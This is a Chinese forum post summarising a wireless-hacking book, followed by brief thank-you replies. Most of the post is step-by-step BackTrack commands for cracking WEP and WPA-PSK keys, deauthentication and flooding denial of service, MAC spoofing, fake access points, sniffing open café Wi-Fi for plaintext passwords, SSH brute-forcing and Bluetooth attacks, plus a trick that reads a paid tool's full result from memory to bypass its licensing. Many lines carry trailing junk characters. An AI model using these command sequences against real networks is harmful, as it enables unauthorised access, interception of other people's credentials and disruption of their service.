格西欧解决方案
树熊
查看: 9350|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3715

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。0 x9 X, j/ M: {6 q1 u" m

* m( k8 D: z( \. |( x7 I6 Q$ v以下所有操作均在BackTrack 4中进行。: w3 @) E" q% A- I, O: R' x
, O& Y/ P- q6 c/ ?0 ~

; v* I7 S# Y9 d无线WEP加密P解:
, F# H4 v- W1 ^5 ^. \9 x4 U# R4 b% n. ~( r
注入P解:
9 M$ y. l* g! t; V# X6 i
  z! z0 V2 _4 y, c7 nifconfig
* J% j/ B( I# a' X. O) N4 p6 K& l/ i1 t: S
ifconfig –a
, X8 ?' f5 Z* H6 z* r+ e+ s  a4 d& |1 |3 o7 F
ifconfig wlan0(无线网卡) up% I" _  n5 P3 b1 f

0 a( d2 @0 ~; s4 Z6 U* Oairmon-ng start wlan0* Q6 P0 ?2 X/ s, Z6 s+ h3 Z) Q

+ r7 x. l, w) M7 ^5 W; Qairodump-ng mon0
& ]/ @4 h% t1 O$ j4 A# L5 t* f6 K* Z$ i+ L1 H, \( F
airodump-ng --ivs –w ivsfile –c 频道 mon0或
$ Y7 M5 r  W9 m3 q7 K* H
* g8 A. R5 E( m( h6 ]- w$ Fairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0) @4 W9 @# Y' g" R1 X5 {
% V, j) ]6 x8 ^: _- L
aireplay-ng -3 –b BSSID –h Station mon0
3 z1 ?2 P' Z! \. G, s  d
1 i- T) h/ M0 Eaircrack-ng ivsfile-01.ivs( [6 J# s" p* h( P( Z2 y/ }

) `! t0 M: I; {! J* V虚连接P解(适用于无客户端连接APP解)" N3 {6 w/ }* Y  N. w7 c

; n& @& {6 y3 `( Zifconfig, D5 G" ]! q7 c% C  P7 Q7 p
  `3 c: ^. r# |; Q7 x; Q% b4 G
ifconfig –a) _: `& R5 l' d/ U: k; [9 b% p
. w1 u. {  W0 W  t' @3 ~
ifconfig wlan0(无线网卡) up# r& j. g4 |% U1 ?, n

, N* r; {1 o/ ^5 z, Aairmon-ng start wlan0
, ~( e& d2 F' o" F
7 E2 C' i$ B8 s- N! M8 pairodump-ng mon04 `' p) X" Z8 o+ O6 X+ A
+ I' {) b# i# v+ N! W6 [8 y  k" `4 B
airodump-ng --ivs –w ivsfile –c 频道 mon0或: g6 ?" _+ l! g- j6 y
  ^  V2 ?: D) c8 h6 I7 G9 X7 R% m
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0; z8 [& Q' V4 W& u2 ?3 M+ M
6 T* G# z9 n: }+ M; w2 H' ^4 c
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon08 N0 j; U* q" X$ ?

  a# J0 d; E3 o3 N9 L$ iaireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0
# V/ h! O1 c. q
4 t$ n3 \* y1 }9 d7 I: E! K8 Faircrack-ng ivsfile-01.ivs- i9 Z1 Y6 O4 U7 f! w5 a/ i

( I) L  R1 V/ s0 X% ^. Q
/ ^7 g# ~+ ~0 N, K- b, I& K: D7 S1 K还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。
* E% B$ |# `2 j8 |- d. n. X3 p5 H, e2 a

3 ]: c7 ^) a, i9 J6 p+ FWPA-PSKP解% @. F5 O. z& Y

0 [6 n% t5 v5 pifconfig8 W  |3 [1 B# C( D4 l6 V6 j; m2 E
4 A3 n8 R1 k* |6 v0 }
ifconfig –a& M# t/ Z. x9 R  G3 u# T! E
: x* o1 E$ d% h1 i  K5 d0 A
ifconfig wlan0(无线网卡) up" \0 y% _  A5 y# y& u2 d7 R
( C0 u7 y# Z4 w/ G: N; A( G
airmon-ng start wlan0% \, Z" t2 v5 F  n
0 m( y' u8 m  o% S5 i3 X; _* `0 R
airodump-ng mon0
5 |+ _- i# e& B. F5 \( C; A5 H
# T$ _7 q! |- X  xairodump-ng –w capfile –c 频道 mon0
# F4 ]2 g8 X* F+ S" l
0 c+ U; Y3 G- V. u0 {# p# s" R. |aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包# f3 u, @" Q2 V" u5 J

1 s" d! ?3 e+ E9 @( }2 i2 ], S9 Taircrack-ng –w Dic capfile-01.cap或
2 a4 j3 J" e! H/ k& V/ t, Q, l4 x# }  J, V
cowpatty –f Dic –r capfile-01.cap –s SSID+ u! E. Y  l+ d( T7 X3 X( R0 A

8 f% z. z6 v6 \6 pcowpatty –d HashTable.Hash –r capfile-01.cap –s SSID
7 L( V" ^1 x( D4 L& k" s$ h, u
2 K, N, `6 j! w傻瓜式P解软件SpoonWPA。
* U) i: _9 b" ?+ n  r  s. O1 ]; Y( e( S
BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst
" g; ^" k3 o+ D( e; \
+ R3 _) I) O6 m" b6 r: l/ _
- V( W0 L1 K# h* E6 J% Y  s字典文件的生成和上传# {! Z4 O/ ]" b$ l0 B0 I" w0 G4 y
4 g) z2 r. W% M" R
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。
$ A' @8 S: Z" r7 b7 K) k: P/ {! j* t' R( C8 n1 i/ v2 r/ S; T
: Q5 n( q9 O. B3 O- t
BT4下开启Tftp:Services—TFTPD—start TFTPD
! r! ?! I$ `6 o' ~
! B. K% C4 S9 d  V. O0 R在Windows的CMD中运行 tftp –i IP put **.dic
3 g/ _  F* c, {6 S2 x) V$ ?. Z2 t: ]( Q( T" x* {

- M! @5 g6 a8 m, s. x: NBT4下开启SSH:Services—SSH—start SSH
) w: `2 C9 k# F1 Y0 U  O( _0 n, @3 w( S. m* p
Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root, `8 j- `9 V  y4 V# r3 G- e6 H
. H; M  \- B/ ?- c

2 U* T: A/ m% LAP限制MAC时的解决
$ m* e- }# [4 }& Y' f
  L3 O5 b% o: B& S当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:& v' L# h+ u. m

$ f/ `' p  u. v" M7 Oifconfig wlan0 hw ether NewMAC
6 O+ B& w, q% A  e5 H7 p) U& N' D" b$ n& v2 R. ]7 F

1 g. b* M  ^1 B* ?关闭SSID广播的AP探测:
! T; X# h/ l5 A& ?$ @* n8 z- `8 ?% m6 Z
1.     Deauth攻击:  b( f' c$ _! d) ^

$ g' |! M& m2 w" s. d9 fairodump-ng mon0
* }" c" K. F/ T) S$ \6 i
4 l" F4 |) W1 b" v9 x& a3 E' C7 vaireplay-ng -0 10 –a BSSID –h Station mon0
4 u4 W. t0 v3 {7 P3 @! M3 m, z  c' [
2.     抓包分析
4 k! z, ]/ w! z1 Z8 d; G( z: q9 H
; e1 w- u5 G: cOmnipeek
1 Q' e6 ^' o5 H! f' v" _- l& G" P2 H. B. J* D$ {+ [* ]% X3 \
Tcpdump –n –e –vvv –i 网卡名0 z3 x( k) E$ l% L( v
' R6 `) f5 Z" U  @
3.     暴力P解
! [# F5 T. _: s/ v+ g/ B  L
9 m0 W5 i& K- T  J! l9 d- UCharon 1.1暴力P解7 T1 Y. g* {) n% {% \
- K! m- |8 n8 Y+ ~
  j8 {' g( F9 ]6 X
无线加密数据包的解密
3 ?! \8 P' M, P# y# l) m3 Y" a0 L7 W, F, G. ]- R
. \/ L6 w  S% b" `, x: z; b1 w6 C
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
8 z, ^& ]: c' L9 D
$ j; h' y; |& Z6 E$ EFilterNS     DNS解析数据包
* t$ k: k# ^1 V3 e4 h4 y
" I0 \: X. d5 J+ X0 B  kFilter:HTTP    WEB访问数据包; r& c' n+ F+ l+ q4 q/ _+ m

* {8 s4 M# r# A( j+ hFilter:msnms   MSN' H5 a+ M" x; x/ l  E4 P
! d* s, U% e1 s# f+ x7 M
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。3 R) \; D  g3 J! m* l

  a$ z2 x9 \' I. H使用airdecap-ng解密:
4 }- [0 i/ U' v
2 b1 r: \3 H# c$ a- C5 G& ]5 iAirdecap-ng –b BSSID –e SSID –w 密码 ***.cap5 k9 z- Q; x+ ^: f! L4 I1 p1 h
: ?7 d1 n4 F$ G: A

9 n# Q( z' l" D. `$ A( Z4 z/ O咖啡馆中无线数据截取(开放式无加密AP)  t8 @# h1 G6 w) q5 a4 f

; E5 p8 Q' O) W7 Y& ]! F1.Airodump-ng –w data –c频道 mon0* I5 X% O% n( F( |% F' M$ H. H
9 f) X' `+ Y# O2 \- g2 e8 s5 R
2.使用WireShark打开分析
8 x( [: X! x* L2 W& s
$ [$ |  ?5 k; l+ e0 G6 d
: t1 m+ y5 o2 ~  c( g* tBT4下的渗透工具:3 q, d+ x) w# K4 t, ^3 G8 ?& }9 M
3 A- A& Q  y2 e6 y3 M
nmap –sP IP/24        判断C段下存活的主机
$ d) b2 e  y2 I: `, U! c- ~
8 U9 ^( G" h. I; P% g+ Lnmap –vv –sS IP/24 –p Port    扫描指定端口是否开放
0 |3 r5 D$ e( @  @/ p9 w8 A
# x& J: w( @/ C0 i/ Vnmap –vv –sV IP –p port   指定端口的详细信息。。。
* U7 Z# _9 V2 r
. l: o8 H, h, A8 n6 w0 v7 Nnamp –O IP/24    判断主机的系统版本
8 q# W# D! H' ?: `. U1 M; c
6 |& P' |  @% n# D/ D; f# \' ^. z# v! O" F, p
GUI 版nmap:Zenmap . T/ d) c+ ?' `" l7 b5 t
# R% j7 m! `% {4 _+ s# ?% |
; A2 f1 G, Q% r
Amap使用:amap –B IP port
1 T' B( V! K$ G# f: n9 P' t) s0 q6 I; o
Nbtscan(扫描Windows网络NetBios信息):
5 x# S; V' _' s) T; y, f- r2 Y4 S0 M4 n( F; B
nbtscan –v –s : IP/24
6 N( g8 W0 c" V. d$ P+ j5 R, R: ^2 S) ~4 n) u" {$ ?+ o
nbtscan –r IP
! N1 W1 Y! Z- e) [2 S) o7 l% N* X
0 j' q0 j! K4 h" o
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com." ]9 j$ n+ W5 R
2 ^# ^6 D$ G2 b+ t$ w
- T" ^- p7 E) w& X
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
$ O& [6 \" ]7 K! B0 r1 }+ ?" r' D7 c( O8 O  u# d! x
BruteSSH: ./bruthe.py –h IP –u Username –d Dic
, I7 d! ^6 Y# ?# g. ]$ M& W$ E  Z  a5 X& t
Metasploit3使用8 d- _/ b2 J1 z4 |# @0 X
无线D.0.S
3 Y+ |; K8 u4 y; C; _! Q
0 }. d% \# e. W- N( o# d8 q
( |: [  Q% o  r  Q* C/ k7 ]& RAuth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)6 l" @9 h; M7 p( x+ B9 A& i# t( [1 h; w
. A* Q" S4 |) w- W( A
airmon-ng start wlan0
/ S" b5 p$ o8 g4 e; ~% @) \+ T3 A* h1 f
airodump-ng mon0+ b) `, U/ Z5 c
' k. |$ R5 j0 U6 e0 E% a
mdk3 mon0 a –a BSSID
: b- f, W& N  D0 E# }. s3 A2 G2 x9 H9 O+ W% c
对所有的AP攻击:mdk3 mon0 a6 h: t. V' s/ a& M$ t- Q

, C1 S, H3 L0 S+ z" m. v
( m+ [. I! @: kDeauth Flood 攻击
3 I& @7 l; l% ^* h+ s0 f- @0 ~9 Q8 s
mdk3 mon0 d –c Channel( t/ _& t3 m# `! ?3 W. a

) g$ v# ^8 v: s' z  A; ]  r/ i+ T图形化D.O.S攻击:Charon
- ]9 T2 `  x( R/ N. x  k0 `
# m& m0 |  ], ?, a8 R  \/ e2 a4 M' {" k- D0 B8 `/ s: {" h
当受到攻击时,使用Wireshark抓包可以看到异常信息。% Q' ?( [) e  f3 a% Z, p1 p0 V
& T8 ?2 M& n) k, |; w8 [. S
$ e4 Q1 Q% g0 C5 X. e' o
WPA-PSK高速P解- t- x# K: s4 U) B+ V
" J, {: j" q3 ?, I
1.       WPA-PSK PMK Hash TablesP解
* h* M9 l) {$ L& j) S* i' q7 Z7 d' P/ Z0 z
Cowpatty –d HashTable.hash –r ***.cap –s SSID4 r' G+ k' R5 }1 y
' G$ ~; d+ L1 L1 [+ X
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
6 B7 t7 w) ~' K8 [7 M8 i& b1 W: l! e5 A# ]5 L
2.       GPU辅助高速P解2 v, C) z) @) t5 _# {" `
6 s( C* I) J/ _$ O  W2 l) w
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。9 E& @4 ^  H  X0 e& x. m
: t8 j1 L3 _- ~+ ?# A
3.       分布式P解2 B; {) {2 |4 T0 x

5 n/ c( o, m5 S* E& D
8 P6 f0 k# F, a2 t2 aAP的伪造
. H# B$ g4 O6 d7 H( C
) [) r/ I% S0 Z3 L; l+ R把AP的MAC改成目标AP的MAC
1 q* z* x& ]: U- H! r1 w, C
+ F( L5 \0 A9 H/ D& n9 V0 ?/ b网卡软AP
' `/ a3 X) z( `8 D1 P4 k7 e9 K0 P: ?; y& n' i3 _) w1 O3 @

. m4 B0 r2 n+ b& x" q: @+ ]) g8 q! V+ z伪造大量虚假AP信号:- i0 K2 \9 j+ [# D! A2 \

% J2 ?7 @$ R, z" I" V; j随机SSID:mdk3 mon0 b –g –c 频道 2 C9 G( z8 k% H# O+ I
2 U+ A8 O4 F( {* h- ]; v! y
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度" U6 x: [7 k3 S8 {# @
8 G( u1 R3 Y" B5 H
4 O$ S) ~- [0 x' w8 @
War-Driving
% O! s" n( G* \9 i
7 W+ Q* T! J4 o2 f9 h) Z3 x8 d, m热点地图绘制
6 o8 H# Q% _2 i5 `  Q* j$ G# o
8 p1 C5 a1 X, C) uWindows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
! ~0 `! ~) l( A( ?! s/ B+ L1 s4 K/ E; S3 B5 u  k
0 Y* |4 }3 [3 L' }/ ^2 A2 `
Netstumble
1 Y. J* Z+ ]/ d# j# F5 T
) G) Z% J2 t4 ~7 F2 r; c) o
$ t- W' R' ^5 f  Y蓝牙Hacking! v& P1 }- b$ c0 {9 d, u! ?  @4 h
% |+ T! w" f, ^9 T7 O  K% {
Windows下的Blue Soleil工具
: s* \+ _3 k9 `; M3 G) n
6 h( e! q% ^! gBT4:- C( {9 `# s: P1 \/ b) `) F
/ E% J8 T- Q$ D. L$ P; |$ G
hciconfig 查看蓝牙适配器7 E# x- f0 B9 i. M( [' I. n2 D6 z
3 H# w% n& Y" S: ]% W
hciconfig hci0 up 载入蓝牙适配器
  [! J$ o% i/ b$ n5 ?1 t# Z
( O- b. Q' T' _; `hciconfig hci0 class 蓝牙适配器详细信息/ _% u$ f% j& f) @& Z/ C
0 U, u/ d- F  E: k" c
: Z7 ~2 A6 k' u& _# L4 h
hcitool(扫描蓝牙)
( q- r/ }7 _2 r1 P* B3 M% N+ o6 W# T! _3 |0 N$ d
hcitool –i hci0 scan
) f/ Y" v! Y0 r" m# ?6 Z2 W; t
& ^4 _& v4 t$ S) o4 i8 [. mBTscanner(扫描蓝牙)3 V. z+ S8 d; F/ b2 `5 f( C
1 s2 X! v9 `: ^) E) U
" P( T- M! G  i& c* I( x" v
蓝牙攻击:
% i9 ^/ L- Z# N6 A! G
/ H" A4 E7 a. M" _$ ?BlueBugging (适用于BlueTooth V1.1的手机)
0 l% R! ]% u, \1 A& c7 H* @$ P, l0 U) g8 b% D7 K/ _: T
Bluebugger工具:
0 d8 U, D% j+ @; \- c
$ ^. \6 e- d: sBulebugger –a HD_Addr info# R2 _" F) q4 a. Y$ I. P

8 M: u# G$ A! S# L1 T
* T6 F- g( q' M, u' ]2 @3 U* m. mBlueJacking/ o* K' T/ `/ q. c

1 F) ^1 ]7 y) c0 W. d! |实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
. ~+ o8 D' |0 P7 y' h  e, G* Q" t0 E) |  I5 D

8 G% y4 h  `7 tHD_Addr修改:
( {1 p' k  c& I* ?) b* K8 `9 J3 q, u  a  d+ F& b" U+ y
Bdaddr工具
7 `* m; N( g; O! j
" a: o% U( P) a; \0 V! Hbdaddr –i 蓝牙设备名 新HD_addr/ C( K  Z3 ~! C! }0 d, y) r
" O/ F. U( {0 w* G8 U

2 D8 _. d2 S& n$ B5 b( o8 c) j9 m4 c蓝牙D.O.S
) Q+ r0 y; y6 V8 P6 ?! R7 q; C
' X; ~* A3 Q/ {+ V7 E$ gl2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务0 E5 p* e& N, ~
5 {5 h8 c# @( x) C) I+ K7 r
hciconfig
) e5 x: b" L8 `$ O+ {8 p+ `  E& b8 O6 ~' E, P$ g8 ^3 T" L) J8 i! q$ a6 Y
hciconfig hci0 up
  Z2 Z5 r6 u9 _% ]7 {- F7 @3 w+ L! ?! w, x
hcitool –i hci0 scan
0 u1 F1 @/ q! |+ j  ?1 ]! V: T7 [
# v# }- C0 s  c' Dl2ping –s 10000 –目标MAC
; V' k# `3 s3 \
% V: k+ a1 n. F
: n3 D' f6 `7 b8 r) ]* `% x不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件), n% S1 S3 t1 x( l. c* H
. Y! b" H5 U& x' C- V( O
./fang –r ************-############ -s; Q) p9 V( K% M: W; S0 W
- _8 O( o" l* F
暴力P解************-############的蓝牙设备$ e% x, ?! V% i

6 k7 l3 m1 }9 I: M, C% C; i./fang –l 各厂商BD_Addr分配) E$ B; [; \  l; H. f

  W7 ]" k  c8 W6 A* ?  M2 z. R1 U7 M1 Y/ J: p
WifiZoo使用
) l4 K+ X; d5 \2 h5 E( c( d; p$ ]  \; m+ D# b- o7 b* V2 d
./wifizoo.py –c Capfile
" ^/ t9 i0 ~$ G. A) E5 _2 A- X
7 p* l, ~3 l5 P- d0 }# z访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

880

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

149

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2265

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

256

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

711

积分

中尉

该用户从未签到

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。! X3 F3 z* D$ ]% Y+ s8 H) {+ J. \
借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的' J0 J4 x  e$ R$ r! B3 D4 c
呵呵 其实也不贵 21块 快递再一点3 X$ j/ t  m0 D( K: e/ M7 j
我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

手机版| Archiver| 无线门户 ( 粤ICP备11076993 )      小黑屋 | 免责声明

GMT+8, 2015-3-29 14:01 , Processed in 0.165169 second(s), 32 queries , Gzip On .

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表